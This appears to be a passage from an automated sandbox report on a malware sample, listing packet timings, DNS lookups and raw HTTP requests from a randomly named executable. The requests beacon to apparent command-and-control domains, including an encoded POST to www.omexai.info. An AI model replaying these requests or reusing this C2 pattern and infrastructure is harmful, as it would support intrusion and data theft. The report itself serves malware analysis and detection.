                                                        Sep 18, 2024 16:20:59.707788944 CEST8053661188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:59.707825899 CEST8053661188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:59.708185911 CEST8053661188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:59.708282948 CEST5366180192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:21:00.211117983 CEST5366180192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:21:01.229293108 CEST5366280192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:21:01.239927053 CEST8053662188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:21:01.240030050 CEST5366280192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:21:01.251832962 CEST5366280192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:21:01.257162094 CEST8053662188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:21:02.598659039 CEST8053662188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:21:02.598691940 CEST8053662188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:21:02.598705053 CEST8053662188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:21:02.598834038 CEST5366280192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:21:02.599306107 CEST8053662188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:21:02.599319935 CEST8053662188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:21:02.599394083 CEST5366280192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:21:02.599927902 CEST8053662188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:21:02.599955082 CEST8053662188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:21:02.599984884 CEST5366280192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:21:02.600617886 CEST8053662188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:21:02.600668907 CEST5366280192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:21:02.604477882 CEST5366280192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:21:02.611152887 CEST8053662188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:21:07.899463892 CEST5366380192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:07.904364109 CEST805366313.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:21:07.905128002 CEST5366380192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:07.916275024 CEST5366380192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:07.921077013 CEST805366313.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:21:08.361392021 CEST805366313.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:21:08.364978075 CEST5366380192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:09.427862883 CEST5366380192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:09.432887077 CEST805366313.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:21:10.445796967 CEST5366480192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:10.451601982 CEST805366413.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:21:10.455523014 CEST5366480192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:10.467174053 CEST5366480192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:10.472012997 CEST805366413.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:21:10.922379971 CEST805366413.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:21:10.922447920 CEST5366480192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:11.974678993 CEST5366480192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:11.979809999 CEST805366413.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:21:12.993596077 CEST5366580192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:12.998596907 CEST805366513.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:21:12.998666048 CEST5366580192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:13.009901047 CEST5366580192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:13.014764071 CEST805366513.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:21:13.014823914 CEST805366513.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:21:13.470511913 CEST805366513.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:21:13.470592976 CEST5366580192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:14.521574974 CEST5366580192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:14.526588917 CEST805366513.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:21:15.540352106 CEST5366680192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:15.631150961 CEST805366613.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:21:15.631488085 CEST5366680192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:15.637356043 CEST5366680192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:15.642333031 CEST805366613.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:21:16.091551065 CEST805366613.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:21:16.091597080 CEST805366613.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:21:16.091717958 CEST5366680192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:16.094008923 CEST5366680192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:21:16.098818064 CEST805366613.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:21:37.695892096 CEST5366780192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:37.700874090 CEST8053667148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:21:37.701056004 CEST5366780192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:37.710448980 CEST5366780192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:37.715442896 CEST8053667148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:21:38.233175039 CEST8053667148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:21:38.233227968 CEST8053667148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:21:38.233370066 CEST5366780192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:39.224632025 CEST5366780192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:40.242609024 CEST5366880192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:40.251221895 CEST8053668148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:21:40.251300097 CEST5366880192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:40.260744095 CEST5366880192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:40.267596960 CEST8053668148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:21:40.764022112 CEST8053668148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:21:40.764096022 CEST8053668148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:21:40.764370918 CEST5366880192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:41.771486044 CEST5366880192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:42.790940046 CEST5366980192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:42.795902967 CEST8053669148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:21:42.796063900 CEST5366980192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:42.810950041 CEST5366980192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:42.815815926 CEST8053669148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:21:42.815912962 CEST8053669148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:21:43.321335077 CEST8053669148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:21:43.352293015 CEST8053669148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:21:43.352377892 CEST5366980192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:44.318384886 CEST5366980192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:45.337256908 CEST5367080192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:45.342228889 CEST8053670148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:21:45.342340946 CEST5367080192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:45.351696014 CEST5367080192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:45.357007980 CEST8053670148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:21:45.847976923 CEST8053670148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:21:45.848057985 CEST8053670148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:21:45.848265886 CEST5367080192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:45.852546930 CEST5367080192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:21:45.859451056 CEST8053670148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:21:50.871412039 CEST5367180192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:50.876506090 CEST80536713.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:21:50.876739979 CEST5367180192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:50.886434078 CEST5367180192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:50.891587973 CEST80536713.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:21:51.341480970 CEST80536713.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:21:51.341562986 CEST5367180192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:52.396927118 CEST5367180192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:52.401978016 CEST80536713.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:21:53.416330099 CEST5367280192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:53.421813011 CEST80536723.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:21:53.421952963 CEST5367280192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:53.431540966 CEST5367280192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:53.437256098 CEST80536723.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:21:54.000200033 CEST80536723.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:21:54.000396013 CEST5367280192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:54.944974899 CEST5367280192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:54.949928045 CEST80536723.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:21:55.964123964 CEST5367380192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:55.971205950 CEST80536733.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:21:55.971301079 CEST5367380192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:55.982006073 CEST5367380192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:55.988341093 CEST80536733.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:21:55.988465071 CEST80536733.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:21:56.455787897 CEST80536733.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:21:56.455893040 CEST5367380192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:57.490289927 CEST5367380192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:57.495148897 CEST80536733.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:21:58.509232998 CEST5367480192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:58.514313936 CEST80536743.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:21:58.514544964 CEST5367480192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:58.520375967 CEST5367480192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:58.525379896 CEST80536743.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:21:58.972949028 CEST80536743.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:21:58.973114967 CEST80536743.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:21:58.973357916 CEST5367480192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:58.975872040 CEST5367480192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:21:58.980730057 CEST80536743.33.130.190192.168.2.5

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 18, 2024 16:17:43.437292099 CEST53603061.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:17:45.919445992 CEST53546661.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:17:54.515930891 CEST6013653192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:17:54.525681019 CEST53601361.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:17:59.541709900 CEST5807853192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:17:59.553081036 CEST53580781.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:18:04.571160078 CEST5646253192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:18:05.035337925 CEST53564621.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:18:20.619143009 CEST5803153192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:18:20.643585920 CEST53580311.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:18:34.932506084 CEST5949953192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:18:35.293678045 CEST53594991.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:18:48.573128939 CEST4978253192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:18:48.837045908 CEST53497821.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:19:02.463407040 CEST4925653192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:19:02.520167112 CEST53492561.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:19:16.071716070 CEST6159253192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:19:16.758904934 CEST53615921.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:19:30.025310040 CEST4936053192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:19:30.040410042 CEST53493601.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:19:43.368088007 CEST5654953192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:19:43.382375002 CEST53565491.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:19:56.509138107 CEST6259453192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:20:09.949485064 CEST5606353192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:20:10.959023952 CEST5606353192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:20:11.014245987 CEST53560631.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:20:11.014307022 CEST53560631.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:20:24.930736065 CEST5349853192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:20:25.928834915 CEST5349853192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:20:26.209305048 CEST53534981.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:20:26.209332943 CEST53534981.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:20:39.805907011 CEST5632253192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:20:39.922502995 CEST53563221.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:20:53.493242025 CEST6403853192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:20:53.517534971 CEST53640381.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:21:07.620927095 CEST6123353192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:21:07.893649101 CEST53612331.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:21:24.200917959 CEST5563753192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:21:24.209978104 CEST53556371.1.1.1192.168.2.5
                                                        Sep 18, 2024 16:21:29.632694960 CEST5086953192.168.2.51.1.1.1
                                                        Sep 18, 2024 16:21:29.642188072 CEST53508691.1.1.1192.168.2.5

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Sep 18, 2024 16:17:54.515930891 CEST192.168.2.51.1.1.10x7f1dStandard query (0)www.woshop.onlineA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:17:59.541709900 CEST192.168.2.51.1.1.10xf300Standard query (0)www.kxshopmr.storeA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:18:04.571160078 CEST192.168.2.51.1.1.10x9b76Standard query (0)www.elsupertodo.netA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:18:20.619143009 CEST192.168.2.51.1.1.10x8f2Standard query (0)www.omexai.infoA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:18:34.932506084 CEST192.168.2.51.1.1.10x1bfeStandard query (0)www.tekilla.wtfA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:18:48.573128939 CEST192.168.2.51.1.1.10x25dbStandard query (0)www.bola88site.oneA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:19:02.463407040 CEST192.168.2.51.1.1.10xa341Standard query (0)www.languagemodel.proA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:19:16.071716070 CEST192.168.2.51.1.1.10xbfc5Standard query (0)www.kexweb.topA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:19:30.025310040 CEST192.168.2.51.1.1.10xd98Standard query (0)www.jobworklanka.onlineA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:19:43.368088007 CEST192.168.2.51.1.1.10x4046Standard query (0)www.dyme.techA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:19:56.509138107 CEST192.168.2.51.1.1.10xe1caStandard query (0)www.arlon-commerce.comA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:20:09.949485064 CEST192.168.2.51.1.1.10xe126Standard query (0)www.mizuquan.topA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:20:10.959023952 CEST192.168.2.51.1.1.10xe126Standard query (0)www.mizuquan.topA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:20:24.930736065 CEST192.168.2.51.1.1.10x1c40Standard query (0)www.nobartv6.websiteA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:20:25.928834915 CEST192.168.2.51.1.1.10x1c40Standard query (0)www.nobartv6.websiteA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:20:39.805907011 CEST192.168.2.51.1.1.10xd024Standard query (0)www.sailnway.netA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:20:53.493242025 CEST192.168.2.51.1.1.10xa174Standard query (0)www.chinaen.orgA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:21:07.620927095 CEST192.168.2.51.1.1.10xa7cdStandard query (0)www.study-in-nyc.onlineA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:21:24.200917959 CEST192.168.2.51.1.1.10xc583Standard query (0)www.woshop.onlineA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:21:29.632694960 CEST192.168.2.51.1.1.10x8a31Standard query (0)www.kxshopmr.storeA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Sep 18, 2024 16:17:54.525681019 CEST1.1.1.1192.168.2.50x7f1dName error (3)www.woshop.onlinenonenoneA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:17:59.553081036 CEST1.1.1.1192.168.2.50xf300Name error (3)www.kxshopmr.storenonenoneA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:18:05.035337925 CEST1.1.1.1192.168.2.50x9b76No error (0)www.elsupertodo.net148.72.152.174A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:18:20.643585920 CEST1.1.1.1192.168.2.50x8f2No error (0)www.omexai.infoomexai.infoCNAME (Canonical name)IN (0x0001)false
                                                        Sep 18, 2024 16:18:20.643585920 CEST1.1.1.1192.168.2.50x8f2No error (0)omexai.info3.33.130.190A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:18:20.643585920 CEST1.1.1.1192.168.2.50x8f2No error (0)omexai.info15.197.148.33A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:18:35.293678045 CEST1.1.1.1192.168.2.50x1bfeNo error (0)www.tekilla.wtfredirect.3dns.boxCNAME (Canonical name)IN (0x0001)false
                                                        Sep 18, 2024 16:18:35.293678045 CEST1.1.1.1192.168.2.50x1bfeNo error (0)redirect.3dns.box172.191.244.62A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:18:48.837045908 CEST1.1.1.1192.168.2.50x25dbNo error (0)www.bola88site.onebola88site.oneCNAME (Canonical name)IN (0x0001)false
                                                        Sep 18, 2024 16:18:48.837045908 CEST1.1.1.1192.168.2.50x25dbNo error (0)bola88site.one172.96.191.39A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:19:02.520167112 CEST1.1.1.1192.168.2.50xa341No error (0)www.languagemodel.prowebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                        Sep 18, 2024 16:19:02.520167112 CEST1.1.1.1192.168.2.50xa341No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:19:16.758904934 CEST1.1.1.1192.168.2.50xbfc5No error (0)www.kexweb.top63.250.47.40A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:19:30.040410042 CEST1.1.1.1192.168.2.50xd98No error (0)www.jobworklanka.onlinejobworklanka.onlineCNAME (Canonical name)IN (0x0001)false
                                                        Sep 18, 2024 16:19:30.040410042 CEST1.1.1.1192.168.2.50xd98No error (0)jobworklanka.online91.184.0.200A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:19:43.382375002 CEST1.1.1.1192.168.2.50x4046No error (0)www.dyme.tech13.248.169.48A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:19:43.382375002 CEST1.1.1.1192.168.2.50x4046No error (0)www.dyme.tech76.223.54.146A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:19:56.586910009 CEST1.1.1.1192.168.2.50xe1caNo error (0)www.arlon-commerce.comwhois-unverified.domainbox.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                        Sep 18, 2024 16:20:11.014245987 CEST1.1.1.1192.168.2.50xe126No error (0)www.mizuquan.top43.242.202.169A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:20:11.014307022 CEST1.1.1.1192.168.2.50xe126No error (0)www.mizuquan.top43.242.202.169A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:20:26.209305048 CEST1.1.1.1192.168.2.50x1c40No error (0)www.nobartv6.website103.224.182.242A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:20:26.209332943 CEST1.1.1.1192.168.2.50x1c40No error (0)www.nobartv6.website103.224.182.242A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:20:39.922502995 CEST1.1.1.1192.168.2.50xd024No error (0)www.sailnway.netredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                        Sep 18, 2024 16:20:39.922502995 CEST1.1.1.1192.168.2.50xd024No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                        Sep 18, 2024 16:20:39.922502995 CEST1.1.1.1192.168.2.50xd024No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:20:53.517534971 CEST1.1.1.1192.168.2.50xa174No error (0)www.chinaen.org188.114.97.3A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:20:53.517534971 CEST1.1.1.1192.168.2.50xa174No error (0)www.chinaen.org188.114.96.3A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:21:07.893649101 CEST1.1.1.1192.168.2.50xa7cdNo error (0)www.study-in-nyc.online13.248.169.48A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:21:07.893649101 CEST1.1.1.1192.168.2.50xa7cdNo error (0)www.study-in-nyc.online76.223.54.146A (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:21:24.209978104 CEST1.1.1.1192.168.2.50xc583Name error (3)www.woshop.onlinenonenoneA (IP address)IN (0x0001)false
                                                        Sep 18, 2024 16:21:29.642188072 CEST1.1.1.1192.168.2.50x8a31Name error (3)www.kxshopmr.storenonenoneA (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • www.elsupertodo.net
                                                        • www.omexai.info
                                                        • www.tekilla.wtf
                                                        • www.bola88site.one
                                                        • www.languagemodel.pro
                                                        • www.kexweb.top
                                                        • www.jobworklanka.online
                                                        • www.dyme.tech
                                                        • www.mizuquan.top
                                                        • www.nobartv6.website
                                                        • www.sailnway.net
                                                        • www.chinaen.org
                                                        • www.study-in-nyc.online

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.553614148.72.152.174801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:18:05.061590910 CEST564OUTGET /2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1fIExehuCYopzYdrD7nSEUYrIRB0qkneaQhNiSOa9oBZv5w==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.elsupertodo.net
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:18:05.577068090 CEST547INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:18:05 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 162
                                                        Connection: close
                                                        Location: https://www.elsupertodo.net/2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1fIExehuCYopzYdrD7nSEUYrIRB0qkneaQhNiSOa9oBZv5w==&2VDlJ=Z2VdhTx
                                                        X-XSS-Protection: 1; mode=block
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.5536153.33.130.190801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:18:20.662254095 CEST813OUTPOST /7xi5/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.omexai.info
                                                        Origin: http://www.omexai.info
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.omexai.info/7xi5/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 35 43 69 57 5a 50 32 61 51 75 4c 36 47 77 67 5a 68 31 35 78 70 56 57 63 48 71 59 46 49 54 54 56 72 51 50 42 79 4b 59 3d
